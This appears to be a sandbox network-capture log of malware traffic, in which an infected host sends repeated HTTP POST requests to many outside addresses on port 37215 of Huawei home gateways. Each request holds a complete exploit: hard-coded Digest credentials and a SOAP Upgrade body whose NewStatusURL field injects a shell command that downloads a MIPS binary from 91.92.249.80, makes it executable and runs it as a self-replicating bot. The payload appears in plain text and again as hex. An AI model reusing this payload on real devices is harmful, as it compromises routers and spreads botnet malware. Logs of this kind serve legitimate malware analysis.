                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1318192.168.2.235982058.142.120.16437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.330017090 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1319192.168.2.2333066157.85.115.7937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.330035925 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1320192.168.2.2342728147.99.166.21237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.330049992 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1321192.168.2.234502441.140.59.3937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.330064058 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1322192.168.2.2354892197.241.109.11437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.330079079 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1323192.168.2.2359866197.140.130.5537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.330135107 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1324192.168.2.2357468157.25.1.22937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.330135107 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1325192.168.2.235085641.8.240.19237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.330156088 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1326192.168.2.234024241.167.90.2337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.330166101 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1327192.168.2.235787213.117.195.24437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.330178022 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1328192.168.2.235994641.253.231.19237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.330188990 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
